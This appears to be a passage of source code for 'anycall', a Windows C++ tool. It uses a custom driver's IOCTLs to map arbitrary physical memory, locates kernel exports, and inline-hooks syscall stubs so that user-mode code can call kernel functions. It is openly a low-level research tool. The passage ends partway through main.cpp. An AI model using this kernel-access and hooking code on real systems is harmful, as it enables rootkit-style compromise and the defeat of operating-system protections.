119 | typedef union _PDE
120 | {
121 | uint64_t value;
122 | struct
123 | {
124 | uint64_t present : 1;
125 | uint64_t writable : 1;
126 | uint64_t user_access : 1;
127 | uint64_t write_through : 1;
128 | uint64_t cache_disabled : 1;
129 | uint64_t accessed : 1;
130 | uint64_t ignored1 : 1;
131 | uint64_t size : 1;
132 | uint64_t ignored_2 : 4;
133 | uint64_t pfn : 36;
134 | uint64_t reserved_1 : 4;
135 | uint64_t ignored_1 : 11;
136 | uint64_t execution_disabled : 1;
137 | };
138 | } PDE, * PPDE;
139 |
140 | //
141 | // arch: x64
142 | // page table entry definition
143 | //
144 | typedef union _PTE
145 | {
146 | uint64_t value;
147 | struct
148 | {
149 | uint64_t present : 1;
150 | uint64_t writable : 1;
151 | uint64_t user_access : 1;
152 | uint64_t write_through : 1;
153 | uint64_t cache_disabled : 1;
154 | uint64_t accessed : 1;
155 | uint64_t dirty : 1;
156 | uint64_t access_type : 1;
157 | uint64_t global : 1;
158 | uint64_t ignored_2 : 3;
159 | uint64_t pfn : 36;
160 | uint64_t reserved_1 : 4;
161 | uint64_t ignored_3 : 7;
162 | uint64_t protection_key : 4;
163 | uint64_t execution_disabled : 1;
164 | };
165 | } PTE, * PPTE;
--------------------------------------------------------------------------------
/anycall/driver.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 | #include
30 | #include
31 | #include
32 |
33 | #include "logger.hpp"
34 | #include "io.hpp"
35 | #include "nt.hpp"
36 |
37 | typedef struct _AC_MAP_PHYSICAL_MEMORY_REQUEST
38 | {
39 | uint64_t physical_address;
40 | size_t size;
41 | } AC_MAP_PHYSICAL_MEMORY_REQUEST, * PAC_MAP_PHYSICAL_MEMORY_REQUEST;
42 |
43 | typedef struct _AC_UNMAP_VIRTUAL_MEMORY_REQUEST
44 | {
45 | uint64_t virtual_address;
46 | size_t size;
47 | } AC_UNMAP_VIRTUAL_MEMORY_REQUEST, * PAC_UNMAP_VIRTUAL_MEMORY_REQUEST;
48 |
49 | typedef struct _MAPPED_VA_INFORMATION
50 | {
51 | uint64_t virtual_address;
52 | size_t size;
53 | } MAPPED_VA_INFORMATION, * PMAPPED_VA_INFORMATION;
54 |
55 | namespace driver
56 | {
57 | //
58 | // map arbitrary physical memory to our process virtual memory
59 | //
60 | uint64_t map_physical_memory( uint64_t physical_address, size_t size )
61 | {
62 | uint64_t mapped_va = 0;
63 |
64 | AC_MAP_PHYSICAL_MEMORY_REQUEST request;
65 | request.physical_address = physical_address;
66 | request.size = size;
67 |
68 | io::request_ioctl(
69 | IOCTL_AC_MAP_PHYSICAL_MEMORY,
70 | &request,
71 | sizeof( AC_MAP_PHYSICAL_MEMORY_REQUEST ),
72 | &mapped_va,
73 | sizeof( uint64_t ),
74 | true );
75 |
76 | return mapped_va;
77 | }
78 |
79 | //
80 | // unmap mapped virtual memory
81 | // size is not actually required to process on driver side
82 | //
83 | void unmap_physical_memory(
84 | uint64_t virtual_address, size_t size )
85 | {
86 | uint64_t fake = 0; // unused
87 |
88 | AC_UNMAP_VIRTUAL_MEMORY_REQUEST request;
89 | request.virtual_address = virtual_address;
90 | request.size = size;
91 |
92 | io::request_ioctl(
93 | IOCTL_AC_UNMAP_PHYSICAL_MEMORY,
94 | &request,
95 | sizeof( AC_UNMAP_VIRTUAL_MEMORY_REQUEST ),
96 | &fake,
97 | sizeof( uint64_t ),
98 | true );
99 | }
100 | } // namespace driver
--------------------------------------------------------------------------------
/anycall/helper.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 | #include
30 | #include
31 |
32 | #include "logger.hpp"
33 | #include "nt.hpp"
34 |
35 | #define CHECK_HANDLE(x) (x && x != INVALID_HANDLE_VALUE)
36 | #define MIN_ADDRESS ((ULONG_PTR)0x8000000000000000)
37 |
38 | typedef struct _PHYSICAL_ADDRESS_RANGE
39 | {
40 | uint64_t start_pa; // start physical address
41 | uint64_t end_pa; // end physical address
42 | } PHYSICAL_ADDRESS_RANGE, * PPHYSICAL_ADDRESS_RANGE;
43 |
44 | typedef struct _SYSMODULE_RESULT
45 | {
46 | uint64_t base_address; // base address of the module
47 | std::string image_full_path; // full path of the module
48 | } SYSMODULE_RESULT, * PSYSMODULE_RESULT;
49 |
50 | namespace helper
51 | {
52 | inline SYSMODULE_RESULT ntoskrnl_cache;
53 |
54 | uint16_t find_syscall_number(
55 | const std::string_view module_name,
56 | const std::string_view procedure_name )
57 | {
58 | const auto procedure =
59 | GetProcAddress(
60 | GetModuleHandle( module_name.data() ),
61 | procedure_name.data() );
62 |
63 | if ( !procedure )
64 | return NULL;
65 |
66 | //
67 | // for NtTraceControl, the syscall number is 0x1C3
68 | // 0x4C 0x8B 0xD1 0xB8 0xC3 0x01 0x00 0x00 0xF6 0x04 0x25
69 | // > ^^^^^^^^^
70 | //
71 | return *( uint16_t* )( ( uint64_t )procedure + 0x4 );
72 | }
73 |
74 | //
75 | // print hex
76 | // for example: 0x00 0x00 0x00 0x00 0x00 ...
77 | //
78 | void print_hex(
79 | const std::string_view prefix,
80 | const std::string_view suffix,
81 | void* buffer, size_t length )
82 | {
83 | if ( !prefix.empty() )
84 | LOG( "%s", prefix.data() );
85 |
86 | for ( auto i = 0; i < length; i++ )
87 | {
88 | // hello terrible expression
89 | LOG( i == length - 1 ? "0x%02X" : "0x%02X ",
90 | *( uint8_t* )( ( uint64_t )buffer + ( 0x1 * i ) ) & 0x000000FF );
91 | }
92 |
93 | LOG( "%s\n", suffix.data() );
94 | }
95 |
96 | //
97 | // wrapper for `_dupenv_s` since getenv is vulnerable
98 | //
99 | bool lookup_env( const char* env, std::string* result )
100 | {
101 | char* buffer = 0;
102 | size_t size = 0;
103 |
104 | if ( _dupenv_s( &buffer, &size, env ) == 0 )
105 | {
106 | if ( !buffer )
107 | {
108 | return false;
109 | }
110 |
111 | *result = buffer;
112 | free( buffer );
113 | }
114 | else
115 | {
116 | return false;
117 | }
118 |
119 | return true;
120 | }
121 |
122 | //
123 | // replace "\\SystemRoot\\" with system-env value if exists
124 | //
125 | void replace_systemroot( std::string& str )
126 | {
127 | std::string env_value;
128 | lookup_env( "SYSTEMROOT", &env_value );
129 |
130 | str.replace(
131 | str.find( "\\SystemRoot\\" ),
132 | sizeof( "\\SystemRoot\\" ) - 1,
133 | env_value.append( "\\" )
134 | );
135 | }
136 |
137 | bool query_physical_memory_ranges( std::vector< PHYSICAL_ADDRESS_RANGE >& result )
138 | {
139 | LSTATUS status;
140 | HKEY registry_key;
141 | DWORD type, size;
142 | LPBYTE buffer;
143 |
144 | //
145 | // open registry key
146 | //
147 | RegOpenKeyEx(
148 | HKEY_LOCAL_MACHINE,
149 | TEXT( "HARDWARE\\RESOURCEMAP\\System Resources\\Physical Memory" ),
150 | 0,
151 | KEY_READ,
152 | ®istry_key );
153 |
154 | //
155 | // query value size first
156 | //
157 | status = RegQueryValueEx(
158 | registry_key,
159 | TEXT( ".Translated" ),
160 | NULL,
161 | &type,
162 | NULL, &size );
163 |
164 | if ( status != ERROR_SUCCESS )
165 | {
166 | LOG( "[!] \033[0;101;30mfailed to query value size\033[0m\n" );
167 | LOG_ERROR();
168 |
169 | return false;
170 | }
171 |
172 | //
173 | // allocate buffer
174 | //
175 | buffer = ( LPBYTE )VirtualAlloc(
176 | NULL, size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE );
177 |
178 | if ( !buffer )
179 | {
180 | LOG( "[!] \033[0;101;30mfailed to allocate buffer\033[0m\n" );
181 | LOG_ERROR();
182 |
183 | return false;
184 | }
185 |
186 | //
187 | // query value
188 | //
189 | status = RegQueryValueEx(
190 | registry_key,
191 | TEXT( ".Translated" ),
192 | NULL,
193 | &type,
194 | buffer, &size );
195 |
196 | if ( status != ERROR_SUCCESS )
197 | {
198 | LOG( "[!] \033[0;101;30mfailed to query value\033[0m\n" );
199 | LOG_ERROR();
200 |
201 | VirtualFree( buffer, NULL, MEM_RELEASE );
202 |
203 | return false;
204 | }
205 |
206 | DWORD count = *( DWORD* )( buffer + 0x10 );
207 | LPBYTE entry = buffer + 0x18;
208 |
209 | for ( auto i = 0; i < count; i++ )
210 | {
211 | result.push_back({
212 | *( uint64_t* )( entry + 0x0 ),
213 | *( uint64_t* )( entry + 0x8 )} );
214 |
215 | //
216 | // next entry
217 | //
218 | entry += 0x14;
219 | }
220 |
221 | VirtualFree( buffer, NULL, MEM_RELEASE );
222 | RegCloseKey( registry_key );
223 |
224 | return true;
225 | }
226 |
227 | uint64_t find_export(
228 | std::string module_name,
229 | const std::string_view export_name )
230 | {
231 | replace_systemroot( module_name );
232 |
233 | //
234 | // temporally map target module to our virtual memory
235 | //
236 | const void* module_base =
237 | LoadLibraryEx(
238 | module_name.data(), // file name
239 | NULL, // file handle
240 | DONT_RESOLVE_DLL_REFERENCES ); // flags
241 |
242 | if ( !module_base )
243 | {
244 | LOG( "[!] \033[0;101;30mfailed to obtain module handle of %s\033[0m\n", module_name.data() );
245 | LOG_ERROR();
246 |
247 | return NULL;
248 | }
249 |
250 | PIMAGE_DOS_HEADER pdos_header;
251 | PIMAGE_NT_HEADERS pnt_headers;
252 | PIMAGE_EXPORT_DIRECTORY pexport_directory;
253 |
254 | pdos_header = ( PIMAGE_DOS_HEADER )module_base;
255 |
256 | if ( pdos_header->e_magic != IMAGE_DOS_SIGNATURE )
257 | {
258 | LOG( "[!] \033[0;101;30minvalid dos signature: 0x%lX\033[0m\n", pdos_header->e_magic );
259 | FreeLibrary( ( HMODULE )module_base );
260 | return NULL;
261 | }
262 |
263 | pnt_headers = ( PIMAGE_NT_HEADERS )
264 | ( (uint64_t)module_base + pdos_header->e_lfanew );
265 |
266 | if ( pnt_headers->Signature != IMAGE_NT_SIGNATURE )
267 | {
268 | LOG( "[!] \033[0;101;30minvalid nt headers signature: 0x%lX\033[0m\n", pnt_headers->Signature );
269 | FreeLibrary( ( HMODULE )module_base );
270 | return NULL;
271 | }
272 |
273 | DWORD export_directory = pnt_headers->OptionalHeader
274 | .DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ].VirtualAddress;
275 |
276 | if ( !export_directory )
277 | {
278 | LOG( "[!] \033[0;101;30minvalid nt headers\033[0m\n", pnt_headers->Signature );
279 | FreeLibrary( ( HMODULE )module_base );
280 | return NULL;
281 | }
282 |
283 | pexport_directory = ( PIMAGE_EXPORT_DIRECTORY )
284 | ( ( uint64_t )module_base + export_directory );
285 |
286 | PDWORD functions = ( PDWORD )
287 | ( ( uint64_t )module_base + pexport_directory->AddressOfFunctions );
288 |
289 | PDWORD names = ( PDWORD )
290 | ( ( uint64_t )module_base + pexport_directory->AddressOfNames );
291 |
292 | PWORD ordinals = ( PWORD )
293 | ( ( uint64_t )module_base + pexport_directory->AddressOfNameOrdinals );
294 |
295 | for ( auto idx = 0;
296 | idx < pexport_directory->NumberOfFunctions;
297 | idx++ )
298 | {
299 | const auto name = reinterpret_cast< char* >
300 | ( ( uint64_t )module_base + names[ idx ] );
301 |
302 | if ( export_name.compare( name ) == 0 )
303 | {
304 | uint64_t result = ( uint64_t )functions[ ordinals[ idx ] ];
305 | FreeLibrary( ( HMODULE )module_base );
306 |
307 | return result;
308 | }
309 | }
310 |
311 | FreeLibrary( ( HMODULE )module_base );
312 | return NULL;
313 | }
314 |
315 | SYSMODULE_RESULT find_sysmodule_address(
316 | const std::string_view target_module_name )
317 | {
318 | const HMODULE module_handle = GetModuleHandle( TEXT( "ntdll.dll" ) );
319 |
320 | if ( !CHECK_HANDLE( module_handle ) )
321 | {
322 | LOG( "[!] \033[0;101;30mfailed to obtain ntdll.dll handle. (0x%lX)\033[0m\n", module_handle );
323 | return {};
324 | }
325 |
326 | PFN_NT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation =
327 | ( PFN_NT_QUERY_SYSTEM_INFORMATION )
328 | GetProcAddress( module_handle, "NtQuerySystemInformation" );
329 |
330 | if ( !pNtQuerySystemInformation )
331 | {
332 | LOG( "[!] \033[0;101;30mfailed to locate NtQuerySystemInformation. (0x%lX)\033[0m\n", GetLastError() );
333 | return {};
334 | }
335 |
336 | NTSTATUS status;
337 | PVOID buffer;
338 | ULONG alloc_size = 0x10000;
339 | ULONG needed_size;
340 |
341 | do
342 | {
343 | buffer = calloc( 1, alloc_size );
344 |
345 | if ( !buffer )
346 | {
347 | LOG( "[!] \033[0;101;30mfailed to allocate buffer for query (0). (0x%lX)\033[0m\n", GetLastError() );
348 | return {};
349 | }
350 |
351 | status = pNtQuerySystemInformation(
352 | SystemModuleInformation,
353 | buffer,
354 | alloc_size,
355 | &needed_size
356 | );
357 |
358 | if ( !NT_SUCCESS( status ) && status != STATUS_INFO_LENGTH_MISMATCH )
359 | {
360 | LOG( "[!] \033[0;101;30mfailed to query system module information. NTSTATUS: 0x%llX\033[0m\n", status );
361 | free( buffer );
362 | return {};
363 | }
364 |
365 | if ( status == STATUS_INFO_LENGTH_MISMATCH )
366 | {
367 | free( buffer );
368 | buffer = NULL;
369 | alloc_size *= 2;
370 | }
371 | } while ( status == STATUS_INFO_LENGTH_MISMATCH );
372 |
373 | if ( !buffer )
374 | {
375 | LOG( "[!] \033[0;101;30mfailed to allocate buffer for query (1). (0x%lX)\033[0m\n", GetLastError() );
376 | return {};
377 | }
378 |
379 | PSYSTEM_MODULE_INFORMATION module_information = ( PSYSTEM_MODULE_INFORMATION )buffer;
380 |
381 | for ( ULONG i = 0; i < module_information->Count; i++ )
382 | {
383 | SYSTEM_MODULE_INFORMATION_ENTRY module_entry = module_information->Modules[ i ];
384 | ULONG_PTR module_address = ( ULONG_PTR )module_entry.DllBase;
385 |
386 | if ( module_address < MIN_ADDRESS )
387 | {
388 | continue;
389 | }
390 |
391 | PCHAR module_name = module_entry.ImageName + module_entry.ModuleNameOffset;
392 |
393 | if ( target_module_name.compare( module_name ) == 0 )
394 | {
395 | return {
396 | module_address,
397 | std::string( module_entry.ImageName ) };
398 | }
399 | }
400 |
401 | free( buffer );
402 | return {};
403 | }
404 |
405 | uint64_t find_ntoskrnl_export(
406 | const std::string_view export_name,
407 | const bool as_rva = false )
408 | {
409 | if ( !ntoskrnl_cache.base_address )
410 | {
411 | SYSMODULE_RESULT ntoskrnl =
412 | find_sysmodule_address( "ntoskrnl.exe" );
413 |
414 | if ( !ntoskrnl.base_address )
415 | {
416 | LOG( "[!] \033[0;101;30mfailed to locate ntoskrnl.exe\033[0m\n" );
417 | LOG_ERROR();
418 |
419 | return NULL;
420 | }
421 |
422 | ntoskrnl_cache = ntoskrnl;
423 | }
424 |
425 | //
426 | // find target function from EAT
427 | //
428 | const auto export_address = find_export(
429 | ntoskrnl_cache.image_full_path, export_name );
430 |
431 | return as_rva ?
432 | export_address :
433 | ntoskrnl_cache.base_address + export_address;
434 | }
435 | } // namespace helper
--------------------------------------------------------------------------------
/anycall/hook.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 | #include
30 | #include
31 |
32 | #include "logger.hpp"
33 |
34 | typedef struct _HOOK_INFORMATION
35 | {
36 | void* source;
37 | void* detour;
38 | std::vector original_bytes;
39 | } HOOK_INFORMATION, * PHOOK_INFORMATION;
40 |
41 | namespace hook
42 | {
43 | //
44 | // store hooked functions in order to restore
45 | //
46 | inline std::vector hooked_functions;
47 |
48 | //
49 | // x64 inline hook shellcode
50 | // http://sandsprite.com/blogs/index.php?uid=7&pid=235&year=2012
51 | //
52 | inline constexpr uint8_t shellcode[12] = {
53 | 0x48, 0xb8, // mov rax, 0xaddress ; set detour address to rax
54 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, // 0xaddress ; detour function address
55 | 0xff, 0xe0 }; // jmp rax ; jmp to detour function
56 |
57 | //
58 | // wrapper for memcpy in order to copy into read-only memory
59 | //
60 | bool copy_memory( void* dst, void* src, size_t size )
61 | {
62 | DWORD old_protection;
63 |
64 | // make it rwx
65 | if ( !VirtualProtect( ( LPVOID )dst, size, PAGE_EXECUTE_READWRITE, &old_protection ) )
66 | return false;
67 |
68 | memcpy( dst, src, size );
69 |
70 | // restore memory protection
71 | if ( !VirtualProtect( ( LPVOID )dst, size, old_protection, &old_protection ) )
72 | return false;
73 |
74 | return true;
75 | }
76 |
77 | //
78 | // fast and simple inline-hook
79 | //
80 | bool hook(
81 | void* source, // function to hook
82 | void* detour, // detour function
83 | bool writable = false ) // in order to prevent useless VirtualProtect calls
84 | {
85 | std::vector shell( sizeof( shellcode ) );
86 | std::vector original( sizeof( shellcode ) );
87 |
88 | //
89 | // create copy of shellcode
90 | //
91 | memcpy( &shell[ 0 ], &shellcode[ 0 ], sizeof( shellcode ) );
92 |
93 | //
94 | // 0xaddress
95 | //
96 | memcpy( &shell[ 2 ], &detour, sizeof( uint64_t ) );
97 |
98 | //
99 | // cache original bytes in order to unhook
100 | //
101 | memcpy( &original[ 0 ], source, sizeof( shellcode ) );
102 |
103 | //
104 | // hook it
105 | // for syscall-inline-hooks, it's always writable (rwx)
106 | //
107 | if ( writable )
108 | {
109 | // prevent useless VirtualProtect calls
110 | memcpy( source, &shell[ 0 ], sizeof( shellcode ) );
111 | }
112 | else
113 | {
114 | copy_memory( source, &shell[ 0 ], sizeof( shellcode ) );
115 | }
116 |
117 | HOOK_INFORMATION information;
118 | information.source = ( void* )( uint64_t )source;
119 | information.detour = ( void* )( uint64_t )detour;
120 | information.original_bytes = original;
121 |
122 | //
123 | // save information in order to restore
124 | //
125 | hooked_functions.push_back( information );
126 | }
127 |
128 | //
129 | // since we loop every each entry until find
130 | // one that matches address, this will cause
131 | // performance issue if we have a lots of entries.
132 | //
133 | bool unhook( void* source, const bool writable = false )
134 | {
135 | // no entries
136 | if ( !hooked_functions.size() )
137 | {
138 | return false;
139 | }
140 |
141 | //
142 | // enumerate every single entries
143 | // stupid way
144 | //
145 | for ( auto entry = hooked_functions.begin();
146 | entry != hooked_functions.end();
147 | entry++ )
148 | {
149 | if ( entry->source == source )
150 | {
151 | //
152 | // restore original bytes
153 | //
154 | if ( writable )
155 | {
156 | memcpy(
157 | entry->source,
158 | &entry->original_bytes[ 0 ],
159 | sizeof( shellcode ) );
160 | }
161 | else
162 | {
163 | copy_memory(
164 | entry->source,
165 | &entry->original_bytes[ 0 ],
166 | sizeof( shellcode ) );
167 | }
168 |
169 | hooked_functions.erase( entry );
170 | return true;
171 | }
172 | }
173 |
174 | return false;
175 | }
176 | }
--------------------------------------------------------------------------------
/anycall/io.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 | #include
30 |
31 | #include "logger.hpp"
32 |
33 | #define AC_DEVICE_NAME "\\\\.\\\\ANYCALL_IO"
34 | #define AC_IOCTL_TYPE 40000
35 |
36 | #define IOCTL_AC_MAP_PHYSICAL_MEMORY \
37 | CTL_CODE( AC_IOCTL_TYPE, 0x900, METHOD_BUFFERED, FILE_ANY_ACCESS )
38 |
39 | #define IOCTL_AC_UNMAP_PHYSICAL_MEMORY \
40 | CTL_CODE( AC_IOCTL_TYPE, 0x901, METHOD_BUFFERED, FILE_ANY_ACCESS )
41 |
42 | namespace io
43 | {
44 | inline HANDLE device_handle;
45 |
46 | bool init()
47 | {
48 | device_handle = CreateFile(
49 | TEXT( AC_DEVICE_NAME ),
50 | GENERIC_READ | GENERIC_WRITE,
51 | 0,
52 | nullptr,
53 | OPEN_EXISTING,
54 | NULL,
55 | NULL );
56 |
57 | if ( !device_handle || device_handle == INVALID_HANDLE_VALUE )
58 | {
59 | LOG( "[!] \033[0;101;30mfailed to obtain device handle\033[0m\n" );
60 | LOG_ERROR();
61 | return false;
62 | }
63 |
64 | LOG( "[+] device handle opened: 0x%p\n", device_handle );
65 |
66 | return true;
67 | }
68 |
69 | //
70 | // wrapper for DeviceIoControl
71 | //
72 | bool request_ioctl(
73 | const uint32_t ioctl_code,
74 | void* in_buffer, const size_t in_buffer_size,
75 | void* out_buffer, const size_t out_buffer_size,
76 | const bool strict = false // if true, check bytes returned
77 | )
78 | {
79 | if ( !device_handle ||
80 | device_handle == INVALID_HANDLE_VALUE )
81 | {
82 | LOG( "[!] \033[0;101;30minvalid device handle\033[0m\n" );
83 | return false;
84 | }
85 |
86 | DWORD bytes_returned = 0;
87 |
88 | //
89 | // send the ioctl request
90 | //
91 | const bool result = DeviceIoControl(
92 | device_handle, // device handle
93 | ioctl_code, // ioctl code
94 | in_buffer, // input buffer
95 | in_buffer_size, // input buffer size
96 | out_buffer, // output buffer
97 | out_buffer_size, // output buffer size
98 | &bytes_returned, // bytes returned
99 | NULL );
100 |
101 | if ( strict )
102 | {
103 | if ( !bytes_returned )
104 | {
105 | LOG( "[!] \033[0;101;30mfailed to complete ioctl request\033[0m\n" );
106 | LOG_ERROR();
107 | return false;
108 | }
109 | }
110 |
111 | return result;
112 | }
113 | } // namespace io
--------------------------------------------------------------------------------
/anycall/logger.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 | #include
30 |
31 | //
32 | // if 1, enable debug prints
33 | //
34 | #define ANYCALL_LOG_ENABLED 1
35 |
36 | #if ANYCALL_LOG_ENABLED
37 | #define LOG(format, ...) \
38 | logger::log(format, __VA_ARGS__)
39 | #else
40 | #define LOG
41 | #endif
42 |
43 | #define LOG_ERROR() \
44 | LOG("[!] failed at %s:%d, (0x%lX)\n", __FILE__, __LINE__, GetLastError())
45 |
46 | namespace logger
47 | {
48 | //
49 | // just a wrapper for `printf`
50 | //
51 | template
52 | __forceinline void log( const char* format, T const& ... args )
53 | {
54 | printf( format, args ... );
55 | }
56 | }
--------------------------------------------------------------------------------
/anycall/main.cpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #include
28 |
29 | #include "logger.hpp"
30 | #include "io.hpp"
31 | #include "syscall.hpp"
32 | #include "console.hpp"
33 | #include "smep.hpp"
34 |
35 | #define DEFAULT_MODULE_NAME "ntdll.dll"
36 | #define DEFAULT_FUNCTION_NAME "NtTraceControl"
37 |
38 | int main( const int argc, const char** argv, const char** envp )
39 | {
40 | console::enable_ansi_escape();
41 |
42 | SetConsoleTitle( TEXT( "anycall by Kento Oki at www.godeye.club" ) );
43 | LOG( "\n[=] \"anycall\" by Kento Oki at www.godeye.club\n" );
44 |
45 | const bool use_default = argc < 3;
46 | const auto module_name = argv[ 1 ];
47 | const auto function_name = argv[ 2 ];
48 |
49 | if ( use_default )
50 | {
51 | LOG( "\n" );
52 | LOG( "[:] usage: anycall.exe [module_name] [function_name]\n" );
53 | LOG( "[:] - module_name: module which contains hook function\n" );
54 | LOG( "[:] - function_name: function that exported by kernel\n" );
55 | LOG( "[:] - this will be used to proxy syscalls we hook\n" );
56 | LOG( "\n" );
